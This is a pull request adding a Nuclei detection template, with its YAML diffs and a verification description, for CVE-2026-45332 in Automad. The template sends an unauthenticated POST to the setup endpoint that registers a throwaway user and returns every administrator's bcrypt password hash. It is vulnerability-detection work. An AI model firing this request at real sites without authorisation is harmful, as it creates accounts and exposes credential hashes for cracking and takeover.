### PR TITLE
CVE-2026-45332 - Automad < 2.0.0-beta.28 - Unauthenticated Admin Password Hash Disclosure

### DIFF
--- a/http/cves/2026/CVE-2026-45332.yaml
+++ b/http/cves/2026/CVE-2026-45332.yaml
@@ -5,13 +5,11 @@ info:
   author: str4k3r
   severity: high
   description: |
-    Automad's /_api/user-collection/create-first-user setup endpoint remains
-    publicly reachable after the initial administrator account has already
-    been created. An unauthenticated attacker can submit a new (throwaway)
-    user registration to this endpoint and receive the full serialized user
-    collection in the JSON response, including the bcrypt password hash of
-    every existing administrator account. Fixed in 2.0.0-beta.28, which
-    rejects the request once a user already exists.
+    Automad 2.0.0-alpha.1 to 2.0.0-beta.27 contains a broken access control vulnerability caused by publicly accessible /_api/user-collection/create-first-user endpoint returning full serialized user data, letting unauthenticated attackers retrieve bcrypt password hashes of all administrator accounts, exploit requires the endpoint to remain publicly accessible after initial setup.
+  impact: |
+    Unauthenticated attackers can retrieve bcrypt password hashes of all administrator accounts, risking credential compromise and full system takeover.
+  remediation: |
+    Upgrade to version 2.0.0-beta.28 or later.
   reference:
     - https://github.com/marcantondahmen/automad/security/advisories/GHSA-xm76-r88j-vm3g
     - https://nvd.nist.gov/vuln/detail/CVE-2026-45332
@@ -19,7 +17,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2026-45332
-    cwe-id: CWE-306
+    cwe-id: CWE-200
   metadata:
     verified: true
     max-request: 2
@@ -27,19 +25,13 @@ info:
     vendor: marcantondahmen
   tags: cve,cve2026,automad,exposure,unauth
 
+flow: http(1) && http(2)
+
 http:
-  - cookie-reuse: true
-    raw:
+  - raw:
       - |
         GET /dashboard/login HTTP/1.1
         Host: {{Hostname}}
-
-      - |
-        POST /_api/user-collection/create-first-user HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        __csrf__={{csrf_token}}&username=nuclei_check&password1=Nuclei-Check-Pw1!&password2=Nuclei-Check-Pw1!&email=nuclei-check%40example.local
 
     extractors:
       - type: regex
@@ -49,6 +41,14 @@ http:
         internal: true
         regex:
           - 'name="csrf" content="([a-f0-9]+)"'
+
+  - raw:
+      - |
+        POST /_api/user-collection/create-first-user HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        __csrf__={{csrf_token}}&username=nuclei_check&password1=Nuclei-Check-Pw1!&password2=Nuclei-Check-Pw1!&email=nuclei-check%40example.local
 
     matchers-condition: and
     matchers:

--- a/http/cves/2026/CVE-2026-45332.yaml
+++ b/http/cves/2026/CVE-2026-45332.yaml
@@ -1,0 +1,64 @@
+id: CVE-2026-45332
+
+info:
+  name: Automad < 2.0.0-beta.28 - Unauthenticated Admin Password Hash Disclosure
+  author: str4k3r
+  severity: high
+  description: |
+    Automad's /_api/user-collection/create-first-user setup endpoint remains
+    publicly reachable after the initial administrator account has already
+    been created. An unauthenticated attacker can submit a new (throwaway)
+    user registration to this endpoint and receive the full serialized user
+    collection in the JSON response, including the bcrypt password hash of
+    every existing administrator account. Fixed in 2.0.0-beta.28, which
+    rejects the request once a user already exists.
+  reference:
+    - https://github.com/marcantondahmen/automad/security/advisories/GHSA-xm76-r88j-vm3g
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-45332
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-45332
+    cwe-id: CWE-306
+  metadata:
+    verified: true
+    max-request: 2
+    product: automad
+    vendor: marcantondahmen
+  tags: cve,cve2026,automad,exposure,unauth
+
+http:
+  - cookie-reuse: true
+    raw:
+      - |
+        GET /dashboard/login HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /_api/user-collection/create-first-user HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        __csrf__={{csrf_token}}&username=nuclei_check&password1=Nuclei-Check-Pw1!&password2=Nuclei-Check-Pw1!&email=nuclei-check%40example.local
+
+    extractors:
+      - type: regex
+        name: csrf_token
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'name="csrf" content="([a-f0-9]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'passwordHash'
+          - 'accounts.php'
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Description

Automad's `/_api/user-collection/create-first-user` setup endpoint remains publicly reachable after the initial administrator account has already been created. An unauthenticated attacker can submit a throwaway user registration to this endpoint and receive the full serialized user collection in the JSON response, including the bcrypt password hash of every existing administrator account.

Affected: `>= 2.0.0-alpha.1, <= 2.0.0-beta.27`
Fixed: `2.0.0-beta.28`

## References

- https://github.com/marcantondahmen/automad/security/advisories/GHSA-xm76-r88j-vm3g
- https://nvd.nist.gov/vuln/detail/CVE-2026-45332

## Verification

Tested against the official `automad/automad` Docker images:
- Vulnerable (`2.0.0-beta.27`): `POST /_api/user-collection/create-first-user` returns `200` with the full user collection including `passwordHash`.
- Fixed (`2.0.0-beta.28`): same request returns `403` with `"Another user has been created already"`.

## CVSS

`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` (7.5, High)

Checklist:
- [x] Followed the [naming conventions](https://github.com/projectdiscovery/nuclei-templates/blob/main/DESIGN_GUIDE.md)
- [x] Extensively tested the template with correct results